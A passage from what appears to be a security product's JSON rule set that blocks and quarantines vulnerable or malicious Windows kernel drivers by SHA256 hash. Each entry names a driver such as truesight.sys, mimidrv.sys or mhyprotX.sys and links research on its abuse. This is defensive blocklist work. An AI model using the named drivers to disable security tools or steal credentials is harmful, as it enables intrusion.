"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "545d0801-0984-5187-bf92-bb28ada9ce66", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984619Z", + "creation_date": "2026-03-23T11:45:29.984621Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984627Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f9fead3227d5cf7daf8c5312db672bc7a684e2216b2f48ff2fcd14493bc9c254", + "comment": "Vulnerable Kernel Driver (aka sfdrvx32.sys) [https://www.loldrivers.io/drivers/2ada18ae-2c52-49b6-b1a0-cf3b267f6dc7/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "545f625a-f25c-5251-a839-ce21fca8fd80", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452402Z", + "creation_date": "2026-03-23T11:45:30.452406Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452415Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bdc73f752c1353d41e877d8bf42a1c53f0bba7d6f52348aaef60e06f4d3087d0", + "comment": "Vulnerable Kernel Driver (aka 
Chaos-Rootkit.sys) [https://www.loldrivers.io/drivers/abcd2c10-1078-4cf9-b320-04ca38d22f98/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "545fa788-bd8a-50fd-90bd-30dae7d0b7ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481549Z", + "creation_date": "2026-03-23T11:45:30.481551Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481557Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ce8583768720be90fae66eed3b6b4a8c7c64e033be53d4cd98246d6e06086d0", + "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "547ffa79-1314-5e96-93e7-5dd23ebe5192", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610441Z", + "creation_date": "2026-03-23T11:45:29.610443Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610448Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "523d1d43e896077f32cd9acaa8e85b513bfb7b013a625e56f0d4e9675d9822ba", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "548e6fbf-d5f1-5867-a0d4-ed3fea70be40", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809519Z", + "creation_date": "2026-03-23T11:45:31.809522Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809530Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cea02a0e948cf58a39d404c6371aa7f3badeacc542d5173304cd75eea689f90e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54910e8b-283e-5fa8-b71d-dd3cc5473565", + "test_maturity_current_count": 
0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150339Z", + "creation_date": "2026-03-23T11:45:31.150341Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150346Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7d97f87f747274a8ce33b70b6fc20361906672880ef474a85039538cef63f45f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5491403c-b558-5497-b1da-240cca8afa8c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833938Z", + "creation_date": "2026-03-23T11:45:30.833941Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833958Z", + "rule_level": 
null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "912623216966eab3524716f2b68903f69487a577461a946b5e15a42804303561", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5492162c-3aa8-581a-a88c-a49c71ed5f00", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807742Z", + "creation_date": "2026-03-23T11:45:31.807745Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807753Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd2b9349201d03dfeeb1a47c3474e3d18cce36b6b8d8c3373d8e83a2aabfd1b0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54998e06-fa00-5425-b217-1774336bb8e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467061Z", + "creation_date": "2026-03-23T11:45:30.467064Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467073Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ebc3a28af05f5b0b456f6ea59ad613109bbb1e2a888d7e3808e331335a77f087", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5499e5ac-acfb-516e-a2a5-04ed97f553c2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612850Z", + "creation_date": "2026-03-23T11:45:29.612852Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612857Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5", + "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "549b2905-b170-5281-8571-96df7e84c434", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463867Z", + "creation_date": "2026-03-23T11:45:30.463889Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463898Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "087270d57f1626f29ba9c25750ca19838a869b73a1f71af50bdf37d6ff776212", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "549e68e8-be40-52a3-abdd-340b05512cfa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481713Z", + "creation_date": "2026-03-23T11:45:30.481715Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481720Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9aeead632435bda4f5723fff5c48dc60451072bfc8649f2ad6e066ca910934a", + "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54af8a41-e081-5f4e-89fa-d438f89ff61d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142090Z", + "creation_date": "2026-03-23T11:45:31.142092Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142098Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "185d458f1f9f4777c5fe7c1cc5bbc1a2630fe7251b8b6388525494552fa5e1fa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", 
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54b01b32-545c-5583-8b27-33360856a8ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980515Z", + "creation_date": "2026-03-23T11:45:29.980517Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980523Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9d61963c098b07fa7ee6dba40f476fc5d2f16301d79a3e8554319d66c69404a9", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54b492d3-3e5d-50e9-8fbf-29ea3313846e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807850Z", + "creation_date": "2026-03-23T11:45:31.807854Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807863Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "228412527401e09d723d5346b33d856986817a4a10fcf30f84d62824b9689252", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54baf95f-00c3-59cf-b1ef-909dc34d6a57", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816999Z", + "creation_date": "2026-03-23T11:45:30.817002Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817007Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c95ebf3f1a87f67d2861dbd1c85dc26c118610af0c9fbf4180428e653ac3e50", + "comment": "Vulnerable Kernel Driver (aka SMARTEIO64.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54c7a0f9-b9a3-5728-b609-ae7e8036736c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968385Z", + "creation_date": "2026-03-23T11:45:29.968387Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968393Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91b0fdd5bfc596b2f7c9db33e822d24f378c706daf6f92682c5fe1043e547f8d", + "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54d588e1-f047-595b-b63e-ec2d61cd755c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160812Z", + "creation_date": "2026-03-23T11:45:31.160815Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160820Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"1b430c1396d7d6bde1ea75da781c46b7e20ebcb8f8c3056746901cb9682a64ce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54d8bf0b-bf17-512f-b48f-b32b2f431ab0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457421Z", + "creation_date": "2026-03-23T11:45:30.457424Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457433Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a6f7897cd08fe9de5e902bb204ff87215584a008f458357d019a50d6139ca4af", + "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54df11fe-b1c6-56a2-b50f-ad2baf2adf02", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472065Z", + "creation_date": "2026-03-23T11:45:30.472069Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472078Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "405a99028c99f36ab0f84a1fd810a167b8f0597725e37513d7430617106501f1", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54e1c019-7b80-5cd5-92d1-52172545936d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978101Z", + "creation_date": "2026-03-23T11:45:29.978103Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978108Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f51bdb0ad924178131c21e39a8ccd191e46b5512b0f2e1cc8486f63e84e5d960", + "comment": "Vulnerable Kernel Driver (aka BlackBoneDrv10.sys) [https://www.loldrivers.io/drivers/722772ee-a461-48ec-933d-f3df1578963e/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54ef37df-7f39-581d-8407-9fa4a5b6fc1d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612163Z", + "creation_date": "2026-03-23T11:45:29.612165Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612171Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ced17d1ee92ae72749afdfe40f5029223d97f0f977e718bd5ab1242d1ff7cb5", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54f47568-6095-56ae-8307-0806875b29b0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151388Z", + "creation_date": "2026-03-23T11:45:31.151391Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151399Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "073c3c6dcdb4534b061a6378d72dfd92ca78584c93cec37df09c1eaac1d57506", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54f6785f-7f93-568d-9df9-e04453eed8e7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808396Z", + "creation_date": "2026-03-23T11:45:31.808398Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808403Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb5f1a8c2dfbd57065f4695958fe22532288ce092a32a867acadd1db3730c49a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "54f76205-0ef5-5c5f-b3ff-e961395117a1", + "test_maturity_current_count": 0, + 
